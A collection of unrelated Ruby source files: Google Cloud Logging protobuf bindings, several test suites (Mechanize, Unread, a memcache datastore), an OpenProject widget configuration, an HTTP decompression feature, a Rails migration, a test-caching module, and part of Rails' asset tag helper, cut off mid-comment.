# source: google/logging/v2/logging.proto
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/monitored_resource_pb'
require 'google/api/resource_pb'
require 'google/logging/v2/log_entry_pb'
require 'google/logging/v2/logging_config_pb'
require 'google/protobuf/duration_pb'
require 'google/protobuf/empty_pb'
require 'google/protobuf/field_mask_pb'
require 'google/protobuf/timestamp_pb'
require 'google/rpc/status_pb'
require 'google/api/annotations_pb'
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/logging/v2/logging.proto", :syntax => :proto3) do
add_message "google.logging.v2.DeleteLogRequest" do
optional :log_name, :string, 1
end
add_message "google.logging.v2.WriteLogEntriesRequest" do
optional :log_name, :string, 1
optional :resource, :message, 2, "google.api.MonitoredResource"
map :labels, :string, :string, 3
repeated :entries, :message, 4, "google.logging.v2.LogEntry"
optional :partial_success, :bool, 5
optional :dry_run, :bool, 6
end
add_message "google.logging.v2.WriteLogEntriesResponse" do
end
add_message "google.logging.v2.WriteLogEntriesPartialErrors" do
map :log_entry_errors, :int32, :message, 1, "google.rpc.Status"
end
add_message "google.logging.v2.ListLogEntriesRequest" do
repeated :resource_names, :string, 8
optional :filter, :string, 2
optional :order_by, :string, 3
optional :page_size, :int32, 4
optional :page_token, :string, 5
end
add_message "google.logging.v2.ListLogEntriesResponse" do
repeated :entries, :message, 1, "google.logging.v2.LogEntry"
optional :next_page_token, :string, 2
end
add_message "google.logging.v2.ListMonitoredResourceDescriptorsRequest" do
optional :page_size, :int32, 1
optional :page_token, :string, 2
end
add_message "google.logging.v2.ListMonitoredResourceDescriptorsResponse" do
repeated :resource_descriptors, :message, 1, "google.api.MonitoredResourceDescriptor"
optional :next_page_token, :string, 2
end
add_message "google.logging.v2.ListLogsRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
repeated :resource_names, :string, 8
end
add_message "google.logging.v2.ListLogsResponse" do
repeated :log_names, :string, 3
optional :next_page_token, :string, 2
end
add_message "google.logging.v2.TailLogEntriesRequest" do
repeated :resource_names, :string, 1
optional :filter, :string, 2
optional :buffer_window, :message, 3, "google.protobuf.Duration"
end
add_message "google.logging.v2.TailLogEntriesResponse" do
repeated :entries, :message, 1, "google.logging.v2.LogEntry"
repeated :suppression_info, :message, 2, "google.logging.v2.TailLogEntriesResponse.SuppressionInfo"
end
add_message "google.logging.v2.TailLogEntriesResponse.SuppressionInfo" do
optional :reason, :enum, 1, "google.logging.v2.TailLogEntriesResponse.SuppressionInfo.Reason"
optional :suppressed_count, :int32, 2
end
add_enum "google.logging.v2.TailLogEntriesResponse.SuppressionInfo.Reason" do
value :REASON_UNSPECIFIED, 0
value :RATE_LIMIT, 1
value :NOT_CONSUMED, 2
end
end
end
module Google
module Cloud
module Logging
module V2
DeleteLogRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.DeleteLogRequest").msgclass
WriteLogEntriesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.WriteLogEntriesRequest").msgclass
WriteLogEntriesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.WriteLogEntriesResponse").msgclass
WriteLogEntriesPartialErrors = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.WriteLogEntriesPartialErrors").msgclass
ListLogEntriesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogEntriesRequest").msgclass
ListLogEntriesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogEntriesResponse").msgclass
ListMonitoredResourceDescriptorsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListMonitoredResourceDescriptorsRequest").msgclass
ListMonitoredResourceDescriptorsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListMonitoredResourceDescriptorsResponse").msgclass
ListLogsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogsRequest").msgclass
ListLogsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogsResponse").msgclass
TailLogEntriesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesRequest").msgclass
TailLogEntriesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesResponse").msgclass
TailLogEntriesResponse::SuppressionInfo = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesResponse.SuppressionInfo").msgclass
TailLogEntriesResponse::SuppressionInfo::Reason = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesResponse.SuppressionInfo.Reason").enummodule
end
end
end
end
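# Hedged usage sketch: the generated msgclasses behave like ordinary protobuf
# messages, so requests can be built, encoded, and decoded directly.
#
#   req = Google::Cloud::Logging::V2::DeleteLogRequest.new(
#     log_name: 'projects/my-project/logs/my-log'  # placeholder resource name
#   )
#   bytes = Google::Cloud::Logging::V2::DeleteLogRequest.encode(req)
#   Google::Cloud::Logging::V2::DeleteLogRequest.decode(bytes).log_name == req.log_name  # => true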
# ---- file 4aeb103504c563a92bae1e07bffac54ef742a8d7 ----
require 'mechanize/test_case'
class TestMechanizePage < Mechanize::TestCase
def setup
super
@uri = URI 'http://example/'
end
def test_selector_methods
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<span class="name" id="out">Eamonn</span>
<span>/</span>
<span class="name" id="bloody">Esther</span>
<span>/</span>
<span class="name" id="rageous">Fletcher</span>
</body>
</html>
BODY
# at(css_selector), % css_selector
assert_equal('Eamonn', page.at('#out').text)
assert_equal('Eamonn', (page % '#out').text)
# at(xpath_selector), % xpath_selector
assert_equal('Esther', page.at('//span[@id="bloody"]').text)
assert_equal('Esther', (page % '//span[@id="bloody"]').text)
# at_css()
assert_equal('Eamonn', page.at_css('#out').text)
# css()
assert_equal('Fletcher', page.css('.name')[2].text)
# at_xpath()
assert_equal('Esther', page.at_xpath('//span[@id="bloody"]').text)
# xpath()
assert_equal('Fletcher', page.xpath('//*[@class="name"]')[2].text)
end
def test_initialize_good_content_type
page = Mechanize::Page.new
assert_equal('text/html', page.content_type)
[
'text/html',
'Text/HTML',
'text/html; charset=UTF-8',
'text/html ; charset=US-ASCII',
'application/xhtml+xml',
'Application/XHTML+XML',
'application/xhtml+xml; charset=UTF-8',
'application/xhtml+xml ; charset=US-ASCII',
].each { |content_type|
page = Mechanize::Page.new(URI('http://example/'),
{ 'content-type' => content_type }, 'hello', '200')
assert_equal(content_type, page.content_type, content_type)
}
end
def test_initialize_bad_content_type
[
'text/xml',
'text/xhtml',
'text/htmlfu',
'footext/html',
'application/xhtml+xmlfu',
'fooapplication/xhtml+xml',
].each { |content_type|
page = Mechanize::Page.new(URI('http://example/'),
{ 'content-type' => content_type }, 'hello', '200')
assert_equal(content_type, page.content_type, content_type)
}
end
def test_frames
page = html_page <<-BODY
<TITLE>A simple frameset document</TITLE>
<FRAMESET cols="20%, 80%">
<FRAMESET rows="100, 200">
<FRAME name="frame1" src="/google.html">
<FRAME name="frame2" src="/form_test.html">
</FRAMESET>
<FRAMESET rows="100, 200">
<FRAME name="frame3" src="/file_upload.html">
<IFRAME src="http://google.com/" name="frame4"></IFRAME>
</FRAMESET>
</FRAMESET>
BODY
assert_equal 3, page.frames.size
assert_equal "frame1", page.frames[0].name
assert_equal "/google.html", page.frames[0].src
assert_equal "Google", page.frames[0].content.title
assert_equal "frame2", page.frames[1].name
assert_equal "/form_test.html", page.frames[1].src
assert_equal "Page Title", page.frames[1].content.title
assert_equal "frame3", page.frames[2].name
assert_equal "/file_upload.html", page.frames[2].src
assert_equal "File Upload Form", page.frames[2].content.title
assert_equal %w[/google.html /file_upload.html], page.frames_with(search: '*[name=frame1], *[name=frame3]').map(&:src)
end
def test_iframes
page = html_page <<-BODY
<TITLE>A simple frameset document</TITLE>
<FRAME name="frame1" src="/google.html">
<IFRAME src="/file_upload.html" name="frame4">
</IFRAME>
BODY
assert_equal 1, page.iframes.size
assert_equal "frame4", page.iframes.first.name
assert_equal "/file_upload.html", page.iframes.first.src
assert_equal "File Upload Form", page.iframes.first.content.title
end unless RUBY_ENGINE == 'jruby' # NekoHTML does not parse IFRAME
def test_image_with
page = html_page <<-BODY
<img src="a.jpg">
<img src="b.jpg">
<img src="c.png">
BODY
assert_equal "http://example/b.jpg",
page.image_with(:src => 'b.jpg').url.to_s
end
def test_images_with
page = html_page <<-BODY
<img src="a.jpg">
<img src="b.jpg">
<img src="c.png">
BODY
images = page.images_with(:src => /jpg\Z/).map { |img| img.url.to_s }
assert_equal %w[http://example/a.jpg http://example/b.jpg], images
end
def test_links
page = html_page <<-BODY
<a href="foo.html">
BODY
assert_equal page.links.first.href, "foo.html"
end
def test_parser_no_attributes
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<a>Hello</a>
<a><img /></a>
<form>
<input />
<select>
<option />
</select>
<textarea></textarea>
</form>
<frame></frame>
</body>
</html>
BODY
# HACK weak assertion
assert_kind_of Nokogiri::HTML::Document, page.root
end
def test_search_links
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<span id="spany">
<a href="b.html">b</a>
<a href="a.html">a</a>
</span>
<a href="6.html">6</a>
</body>
</html>
BODY
links = page.links_with(:search => "#spany a")
assert_equal 2, links.size
assert_equal "b.html", links[0].href
assert_equal "b", links[0].text
assert_equal "a.html", links[1].href
assert_equal "a", links[1].text
end
def test_search_images
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<img src="1.jpg" class="unpretty">
<img src="a.jpg" class="pretty">
<img src="b.jpg">
<img src="c.png" class="pretty">
</body>
</html>
BODY
{
:search => "//img[@class='pretty']",
:xpath => "//img[@class='pretty']",
:css => "img.pretty",
:class => "pretty",
:dom_class => "pretty",
}.each { |key, expr|
images = page.images_with(key => expr)
message = "selecting with #{key.inspect}"
assert_equal 2, images.size
assert_equal "pretty", images[0].dom_class, message
assert_equal "a.jpg", images[0].src, message
assert_equal "pretty", images[1].dom_class, message
assert_equal "c.png", images[1].src, message
}
end
def test_search_bad_selectors
page = html_page <<-BODY
<a href="foo.html">foo</a>
<img src="foo.jpg" />
BODY
assert_empty page.images_with(:search => '//a')
assert_empty page.links_with(:search => '//img')
end
def test_multiple_titles
page = html_page <<-BODY
<!doctype html>
<html>
<head>
<title>HTML>TITLE</title>
</head>
<body>
<svg>
<title>SVGTITLE</title>
<metadata id="metadata5">
<rdf:RDF>
<cc:Work>
<dc:title>RDFDCTITLE</dc:title>
</cc:Work>
</rdf:RDF>
</metadata>
<g></g>
</svg>
</body>
</html>
BODY
assert_equal page.title, "HTML>TITLE"
end
end
# ---- file 033db15b074d95fa648658993f869eef16175f3c ----
require 'spec_helper'
describe Unread::Reader do
before :each do
@reader = Reader.create! :name => 'David'
@other_reader = Reader.create! :name => 'Matz'
wait
@email1 = Email.create!
wait
@email2 = Email.create!
end
describe :have_not_read do
it "should return all readers that have not read a given object" do
expect(Reader.have_not_read(@email1)).to eq [@reader, @other_reader]
expect(Reader.have_not_read(@email2)).to eq [@reader, @other_reader]
end
it "should return *only* the readers that have not read a given object" do
@email1.mark_as_read! :for => @reader
expect(Reader.have_not_read(@email1)).to eq [@other_reader]
expect(Reader.have_not_read(@email1).count).to eq 1
expect(Reader.have_not_read(@email2)).to eq [@reader, @other_reader]
end
it "should not allow invalid parameter" do
[ 42, nil, 'foo', :foo, {} ].each do |not_a_readable|
expect {
Reader.have_not_read(not_a_readable)
}.to raise_error(ArgumentError)
end
end
it "should not allow unsaved readable" do
unsaved_readable = Email.new
expect {
Reader.have_not_read(unsaved_readable)
}.to raise_error(ArgumentError)
end
end
describe :have_read do
it "should return an empty array" do
expect(Reader.have_read(@email1)).to be_empty
expect(Reader.have_read(@email2)).to be_empty
end
it "should return *only* the readers that have read the given object" do
@email1.mark_as_read! :for => @reader
expect(Reader.have_read(@email1)).to eq [@reader]
expect(Reader.have_read(@email1).count).to eq 1
expect(Reader.have_read(@email2)).to be_empty
end
it "should return the reader for all the object when all read" do
Email.mark_as_read! :all, :for => @reader
expect(Reader.have_read(@email1)).to eq [@reader]
expect(Reader.have_read(@email1).count).to eq 1
expect(Reader.have_read(@email2)).to eq [@reader]
expect(Reader.have_read(@email2).count).to eq 1
end
it "should not allow invalid parameter" do
[ 42, nil, 'foo', :foo, {} ].each do |not_a_readable|
expect {
Reader.have_read(not_a_readable)
}.to raise_error(ArgumentError)
end
end
it "should not allow unsaved readable" do
unsaved_readable = Email.new
expect {
Reader.have_read(unsaved_readable)
}.to raise_error(ArgumentError)
end
end
describe :with_read_marks_for do
it "should return readers" do
expect(Reader.with_read_marks_for(@email1).to_a).to eq([@reader, @other_reader])
end
it "should have elements that respond to :read_mark_id" do
all_respond_to_read_mark_id = Reader.with_read_marks_for(@email1).to_a.all? do |reader|
reader.respond_to?(:read_mark_id)
end
expect(all_respond_to_read_mark_id).to be_truthy
end
it "should be countable" do
expect(Reader.with_read_marks_for(@email1).count(:number)).to eq(2)
end
it "should not allow invalid parameter" do
[ 42, nil, 'foo', :foo, {} ].each do |not_a_readable|
expect {
Reader.with_read_marks_for(not_a_readable)
}.to raise_error(ArgumentError)
end
end
it "should not allow unsaved readable" do
unsaved_readable = Email.new
expect {
Reader.with_read_marks_for(unsaved_readable)
}.to raise_error(ArgumentError)
end
end
describe :have_read? do
it "should recognize read objects" do
expect(@reader.have_read?(@email1)).to be_falsey
expect(@reader.have_read?(@email2)).to be_falsey
end
it "should handle updating object" do
@email1.mark_as_read! :for => @reader
wait
expect(@reader.have_read?(@email1)).to be_truthy
@email1.update_attributes! :subject => 'changed'
expect(@reader.have_read?(@email1)).to be_falsey
end
it "should raise error for invalid argument" do
expect {
@reader.have_read?(42)
}.to raise_error(ArgumentError)
end
it "should work with eager-loaded read marks" do
@email1.mark_as_read! :for => @reader
expect {
readers = Reader.with_read_marks_for(@email1).to_a
expect(readers[0].have_read?(@email1)).to be_truthy
expect(readers[1].have_read?(@email1)).to be_falsey
}.to perform_queries(1)
end
it "should work with eager-loaded read marks for the correct readable" do
@email1.mark_as_read! :for => @reader
readers = Reader.with_read_marks_for(@email1).to_a
expect(readers[0].have_read?(@email1)).to be_truthy
expect(readers[0].have_read?(@email2)).to be_falsey
end
end
end
# ---- file 012b611f86e83bc9e17c4f5f005abdacdb042379 ----
# frozen_string_literal: true
module HTTP
module Features
class AutoInflate < Feature
def wrap_response(response)
return response unless %w[deflate gzip x-gzip].include?(response.headers[:content_encoding])
Response.new(
:status => response.status,
:version => response.version,
:headers => response.headers,
:proxy_headers => response.proxy_headers,
:connection => response.connection,
:body => stream_for(response.connection)
)
end
def stream_for(connection)
Response::Body.new(Response::Inflater.new(connection))
end
HTTP::Options.register_feature(:auto_inflate, self)
end
end
end
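# Hedged usage sketch: features registered via HTTP::Options.register_feature
# are enabled per client with .use, after which compressed responses are
# transparently inflated.
#
#   response = HTTP.use(:auto_inflate)
#                  .headers('Accept-Encoding' => 'gzip')
#                  .get('https://example.com')
#   response.to_s  # decompressed body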
# ---- file 6a1ed85ee0ced7fb4ba9d60daaeedac5eb413a06 ----
module Grids::Configuration
class InProjectBaseRegistration < ::Grids::Configuration::Registration
widgets 'work_packages_table',
'work_packages_graph',
'project_description',
'project_details',
'subprojects',
'work_packages_calendar',
'work_packages_overview',
'time_entries_project',
'members',
'news',
'documents',
'custom_text'
remove_query_lambda = -> {
::Query.find_by(id: options[:queryId])&.destroy
}
save_or_manage_queries_lambda = ->(user, project) {
user.allowed_to?(:save_queries, project) &&
user.allowed_to?(:manage_public_queries, project)
}
queries_permission_and_ee_lambda = ->(user, project) {
save_or_manage_queries_lambda.call(user, project) &&
EnterpriseToken.allows_to?(:grid_widget_wp_graph)
}
view_work_packages_lambda = ->(user, project) {
user.allowed_to?(:view_work_packages, project)
}
widget_strategy 'work_packages_table' do
after_destroy remove_query_lambda
allowed save_or_manage_queries_lambda
options_representer '::API::V3::Grids::Widgets::QueryOptionsRepresenter'
end
widget_strategy 'work_packages_graph' do
after_destroy remove_query_lambda
allowed queries_permission_and_ee_lambda
options_representer '::API::V3::Grids::Widgets::ChartOptionsRepresenter'
end
widget_strategy 'custom_text' do
options_representer '::API::V3::Grids::Widgets::CustomTextOptionsRepresenter'
end
widget_strategy 'work_packages_overview' do
allowed view_work_packages_lambda
end
widget_strategy 'work_packages_calendar' do
allowed view_work_packages_lambda
end
widget_strategy 'members' do
allowed ->(user, project) {
user.allowed_to?(:view_members, project)
}
end
widget_strategy 'news' do
allowed ->(user, project) {
user.allowed_to?(:view_news, project)
}
end
widget_strategy 'documents' do
allowed ->(user, project) {
user.allowed_to?(:view_documents, project)
}
end
macroed_getter_setter :view_permission
macroed_getter_setter :edit_permission
macroed_getter_setter :in_project_scope_path
class << self
def all_scopes
view_allowed = Project.allowed_to(User.current, view_permission)
projects = Project.where(id: view_allowed)
projects.map { |p| url_helpers.send(to_scope, p) }
end
def from_scope(scope)
# recognize_routes does not work with engine paths
path = [OpenProject::Configuration.rails_relative_url_root,
'projects',
'([^/]+)',
in_project_scope_path,
'?'].flatten.compact.join('/')
match = Regexp.new(path).match(scope)
return if match.nil?
{
class: grid_class.constantize,
project_id: match[1]
}
end
def writable?(grid, user)
super && user.allowed_to?(edit_permission, grid.project)
end
def visible(user = User.current)
super
.where(project_id: Project.allowed_to(user, view_permission))
end
end
end
end
# ---- file 39fafa4d2697332d5756e4c14ee075ab9ac017f7 ----
module TulOhist::Models
class Av < ActiveFedora::Base
has_metadata name: "base", label: "Base metadata", type: TulOhist::Datastreams::BaseDatastream
end
end
# ---- file 619780e346c82161836b1fdccbd8957dc8473b6f ----
require 'spec_helper'
require 'excursion/datastores/memcache'
describe 'Excursion::Datastores::Memcache' do
def dummy_pool
Excursion::Specs::DUMMY_MEMCACHE_SERVER
end
def fill_pool
dc = Dalli::Client.new dummy_pool, {namespace: 'excursion'}
dc.flush_all
Excursion::Specs::Mocks::SIMPLE_VALUES.each do |key,val|
dc.set(key,val)
end
dc.set(Excursion::Datastores::Memcache::REGISTERED_KEYS, Excursion::Specs::Mocks::SIMPLE_VALUES.keys.map(&:to_s).join(','))
end
subject do
fill_pool
Excursion::Datastores::Memcache.new dummy_pool
end
describe '::new' do
it 'should require a server' do
expect { Excursion::Datastores::Memcache.new }.to raise_exception(ArgumentError)
expect { Excursion::Datastores::Memcache.new nil }.to raise_exception(Excursion::MemcacheConfigurationError)
expect { Excursion::Datastores::Memcache.new dummy_pool }.to_not raise_exception
end
end
describe '#read' do
describe 'key' do
it 'should be required' do
expect { subject.read }.to raise_exception
expect { subject.read('test_key') }.to_not raise_exception
end
it 'should accept a symbol or string' do
expect { subject.read('test_key') }.to_not raise_exception
expect { subject.read(:test_key) }.to_not raise_exception
end
it 'should convert symbols to strings' do
expect(subject.read(:key1)).to eql(subject.read('key1'))
end
end
context 'when the requested key does not exist' do
it 'should return nil' do
subject.read('non_existent_key').should be_nil
end
end
context 'when the requested key exists' do
it 'should return the value of the requested key' do
Excursion::Specs::Mocks::SIMPLE_VALUES.each do |key,val|
expect(subject.read(key)).to eql(val)
end
end
end
end
describe '#write' do
describe 'key' do
it 'should be required' do
expect { subject.write }.to raise_exception
end
it 'should accept a symbol or string' do
expect { subject.write('str_key', 'strval') }.to_not raise_exception
expect { subject.write(:sym_key, 'symval') }.to_not raise_exception
end
it 'should convert symbols to strings' do
subject.write(:sym_key, 'symval')
subject.read('sym_key').should == 'symval'
end
end
describe 'value' do
it 'should be required' do
expect { subject.write('test_key') }.to raise_exception(ArgumentError)
end
end
it 'should add the key to the datastore and set the value' do
subject.write('test_key', 'testval')
subject.read('test_key').should == 'testval'
end
it 'should return the value of the added key' do
subject.write('test_key', 'testval').should == 'testval'
end
end
describe '#delete' do
describe 'key' do
it 'should be required' do
expect { subject.delete }.to raise_exception(ArgumentError)
end
end
context 'when the key exists' do
it 'should remove the key from the datastore' do
subject.read('key1').should_not eql(nil)
subject.delete('key1')
subject.read('key1').should be(nil)
end
it 'should return the value of the deleted key' do
keyval = subject.read('key1')
subject.delete('key1').should eql(keyval)
end
end
context 'when the key does not exist' do
it 'should return nil' do
subject.delete('non_existent_key').should eql(nil)
end
end
end
describe '#all' do
it 'should return a hash of all the registered keys and their values' do
Excursion::Specs::Mocks::SIMPLE_VALUES.each do |k,v|
expect(subject.all[k.to_sym]).to eql(v)
end
end
end
end
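# Hedged sketch of the datastore contract the spec exercises: symbol keys are
# normalized to strings, #write returns the value written, and #all returns a
# symbol-keyed hash of every registered key.
#
#   ds = Excursion::Datastores::Memcache.new('localhost:11211')  # placeholder server
#   ds.write(:app_url, 'http://app.example.com')  # => "http://app.example.com"
#   ds.read('app_url')                            # => "http://app.example.com"
#   ds.all                                        # => { :app_url => "http://app.example.com", ... }
#   ds.delete('app_url')                          # => "http://app.example.com"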
# ---- file 913f979158a91fe4ff6511645913e6d523a6b74e ----
class AddPasswordResetSentAtToUsers < ActiveRecord::Migration[4.2]
def change
add_column :users, :password_reset_sent_at, :datetime
end
end
# ---- file 08e7436b9834895d9a1a2292c1cfb6ca56b9deb0 ----
require "set"
module Onceler
module Recordable
def self.extended(instance)
instance.instance_eval do
@__retvals = {}
@__inherited_retvals = {}
@__ignore_ivars = instance_variables
end
end
def __prepare_recording(recording)
method = recording.name
define_singleton_method(method) do
if @__retvals.key?(method)
@__retvals[method]
else
@__retvals[method] = __record(recording)
end
end
end
def __record(recording)
instance_eval(&recording.block)
end
def __retvals(inherit = false)
retvals = @__inherited_retvals.merge(@__retvals)
retvals.inject({}) do |hash, (key, val)|
hash[key] = val if __mutated?(key, val) || inherit
hash
end
end
def __ivars(inherit = false)
ivars = instance_variables - @__ignore_ivars
ivars.inject({}) do |hash, key|
if key.to_s !~ /\A@__/
val = instance_variable_get(key)
hash[key] = val if __mutated?(key, val) || inherit
end
hash
end
end
# we don't include inherited stuff in __data, because we might need to
# interleave things from an intermediate before(:each) at run time
def __mutated?(key, val)
# top-level recorders don't inherit anything, so we always want to return true
return true unless @__inherited_cache
# need to do both types of comparison, i.e. it's the same object in
# memory (not reassigned), and nothing about it has been changed
return true unless @__inherited_values[key].equal?(val)
return true unless __values_equal?(@__inherited_cache[key], val)
false
end
def __values_equal?(obj1, obj2)
if ActiveRecord::Base === obj1 && ActiveRecord::Base === obj2
cache_key = [obj1, obj2]
return @__comparison_cache[cache_key] if @__comparison_cache.key?(cache_key)
# so as to avoid cycles while traversing AR associations
@__comparison_cache[cache_key] = true
@__comparison_cache[cache_key] = obj1.attributes == obj2.attributes &&
__associations_equal?(obj1, obj2)
else
obj1 == obj2
end
end
# if a nested once block updates an inherited object's associations,
# we want to know about it
def __associations_equal?(obj1, obj2)
cache1 = obj1.instance_variable_get(:@association_cache)
cache2 = obj2.instance_variable_get(:@association_cache)
cache1.size == cache2.size &&
cache1.all? { |k, v| cache2.key?(k) && __values_equal?(v.target, cache2[k].target) }
end
def __data(inherit = false)
@__data ||= {}
@__data[inherit] ||= begin
@__comparison_cache = {}
data = [__ivars(inherit), __retvals(inherit)]
begin
data = Marshal.dump(data)
rescue TypeError
data.each do |hash|
hash.each do |key, val|
find_dump_error(key, val)
end
end
raise # find_dump_error should have re-raised, but just in case...
ensure
__visited_dump_vars.clear
end
@__comparison_cache = nil
data
end
end
def __visited_dump_vars
@__visited_dump_vars ||= Set.new
end
def find_dump_error(key, val, prefix = "")
return if __visited_dump_vars.include?(val)
__visited_dump_vars << val
Marshal.dump(val)
rescue TypeError
# see if anything inside val can't be dumped...
sub_prefix = "#{prefix}#{key} (#<#{val.class}>) => "
if val.respond_to?(:marshal_dump)
find_dump_error("marshal_dump", val.marshal_dump, sub_prefix)
else
# instance var?
val.instance_variables.each do |k|
v = val.instance_variable_get(k)
find_dump_error(k, v, sub_prefix)
end
# hash key/value?
val.each_pair do |k, v|
find_dump_error("hash key #{k}", k, sub_prefix)
find_dump_error("[#{k.inspect}]", v, sub_prefix)
end if val.respond_to?(:each_pair)
# array element?
val.each_with_index do |v, i|
find_dump_error("[#{i}]", v, sub_prefix)
end if val.respond_to?(:each_with_index)
end
# guess it's val proper
raise TypeError.new("Unable to dump #{prefix}#{key} (#<#{val.class}>) in #{self.class.metadata[:location]}: #{$!}")
end
def copy_from(other)
# need two copies of things for __mutated? checks (see above)
@__inherited_cache = Marshal.load(other.__data(:inherit)).inject(&:merge)
ivars, retvals = Marshal.load(other.__data(:inherit))
@__inherited_retvals = retvals
@__inherited_values = ivars.merge(retvals)
ivars.each do |key, value|
instance_variable_set(key, value)
end
retvals.each do |key, value|
define_singleton_method(key) { value }
end
end
end
end
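# Illustrative sketch (not Onceler code) of the dual check __mutated? performs:
# an inherited value counts as untouched only if it is still the very same
# object AND still compares equal to the snapshot captured when it was copied.
#
#   snapshot   = Marshal.load(Marshal.dump(value))  # deep copy kept for later
#   reassigned = !current.equal?(value)             # identity changed
#   changed    = snapshot != current                # mutated in place
#   mutated    = reassigned || changed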
# ---- file 03344db8d2d14cc55c8f3e76af2cabe89e694840 ----
# frozen_string_literal: true
require "active_support/core_ext/array/extract_options"
require "active_support/core_ext/hash/keys"
require "active_support/core_ext/object/inclusion"
require "action_view/helpers/asset_url_helper"
require "action_view/helpers/tag_helper"
module ActionView
# = Action View Asset Tag Helpers
module Helpers #:nodoc:
# This module provides methods for generating HTML that links views to assets such
# as images, JavaScripts, stylesheets, and feeds. These methods do not verify
# the assets exist before linking to them:
#
# image_tag("rails.png")
# # => <img src="/assets/rails.png" />
# stylesheet_link_tag("application")
# # => <link href="/assets/application.css?body=1" rel="stylesheet" />
module AssetTagHelper
include AssetUrlHelper
include TagHelper
mattr_accessor :image_loading
mattr_accessor :image_decoding
mattr_accessor :preload_links_header
mattr_accessor :apply_stylesheet_media_default
# Returns an HTML script tag for each of the +sources+ provided.
#
# Sources may be paths to JavaScript files. Relative paths are assumed to be relative
# to <tt>assets/javascripts</tt>, full paths are assumed to be relative to the document
# root. Relative paths are idiomatic, use absolute paths only when needed.
#
# When passing paths, the ".js" extension is optional. If you do not want ".js"
# appended to the path <tt>extname: false</tt> can be set on the options.
#
# You can modify the HTML attributes of the script tag by passing a hash as the
# last argument.
#
# When the Asset Pipeline is enabled, you can pass the name of your manifest as
# source, and include other JavaScript or CoffeeScript files inside the manifest.
#
# If the server supports Early Hints header links for these assets will be
# automatically pushed.
#
# ==== Options
#
# When the last parameter is a hash you can add HTML attributes using that
# parameter. The following options are supported:
#
# * <tt>:extname</tt> - Append an extension to the generated URL unless the extension
# already exists. This only applies for relative URLs.
# * <tt>:protocol</tt> - Sets the protocol of the generated URL. This option only
# applies when a relative URL and +host+ options are provided.
# * <tt>:host</tt> - When a relative URL is provided the host is added to
# that path.
# * <tt>:skip_pipeline</tt> - This option is used to bypass the asset pipeline
# when it is set to true.
# * <tt>:nonce</tt> - When set to true, adds an automatic nonce value if
# you have Content Security Policy enabled.
#
# ==== Examples
#
# javascript_include_tag "xmlhr"
# # => <script src="/assets/xmlhr.debug-1284139606.js"></script>
#
# javascript_include_tag "xmlhr", host: "localhost", protocol: "https"
# # => <script src="https://localhost/assets/xmlhr.debug-1284139606.js"></script>
#
# javascript_include_tag "template.jst", extname: false
# # => <script src="/assets/template.debug-1284139606.jst"></script>
#
# javascript_include_tag "xmlhr.js"
# # => <script src="/assets/xmlhr.debug-1284139606.js"></script>
#
# javascript_include_tag "common.javascript", "/elsewhere/cools"
# # => <script src="/assets/common.javascript.debug-1284139606.js"></script>
# # <script src="/elsewhere/cools.debug-1284139606.js"></script>
#
# javascript_include_tag "http://www.example.com/xmlhr"
# # => <script src="http://www.example.com/xmlhr"></script>
#
# javascript_include_tag "http://www.example.com/xmlhr.js"
# # => <script src="http://www.example.com/xmlhr.js"></script>
#
# javascript_include_tag "http://www.example.com/xmlhr.js", nonce: true
# # => <script src="http://www.example.com/xmlhr.js" nonce="..."></script>
def javascript_include_tag(*sources)
options = sources.extract_options!.stringify_keys
path_options = options.extract!("protocol", "extname", "host", "skip_pipeline").symbolize_keys
preload_links = []
nopush = options["nopush"].nil? ? true : options.delete("nopush")
crossorigin = options.delete("crossorigin")
crossorigin = "anonymous" if crossorigin == true
integrity = options["integrity"]
rel = options["type"] == "module" ? "modulepreload" : "preload"
sources_tags = sources.uniq.map { |source|
href = path_to_javascript(source, path_options)
if preload_links_header && !options["defer"]
preload_link = "<#{href}>; rel=#{rel}; as=script"
preload_link += "; crossorigin=#{crossorigin}" unless crossorigin.nil?
preload_link += "; integrity=#{integrity}" unless integrity.nil?
preload_link += "; nopush" if nopush
preload_links << preload_link
end
tag_options = {
"src" => href,
"crossorigin" => crossorigin
}.merge!(options)
if tag_options["nonce"] == true
tag_options["nonce"] = content_security_policy_nonce
end
content_tag("script", "", tag_options)
}.join("\n").html_safe
if preload_links_header
send_preload_links_header(preload_links)
end
sources_tags
end
# Returns a stylesheet link tag for the sources specified as arguments.
#
# When passing paths, the <tt>.css</tt> extension is optional.
# If you don't specify an extension, <tt>.css</tt> will be appended automatically.
# If you do not want <tt>.css</tt> appended to the path,
# set <tt>extname: false</tt> in the options.
# You can modify the link attributes by passing a hash as the last argument.
#
  # If the server supports Early Hints, header links for these assets will be
  # automatically pushed.
#
# ==== Options
#
  # * <tt>:extname</tt> - Append an extension to the generated URL unless the extension
  #   already exists. This only applies to relative URLs.
  # * <tt>:protocol</tt> - Sets the protocol of the generated URL. This option only
  #   applies when a relative URL and the +host+ option are provided.
  # * <tt>:host</tt> - When a relative URL is provided, the host is added to
  #   that path.
# * <tt>:skip_pipeline</tt> - This option is used to bypass the asset pipeline
# when it is set to true.
#
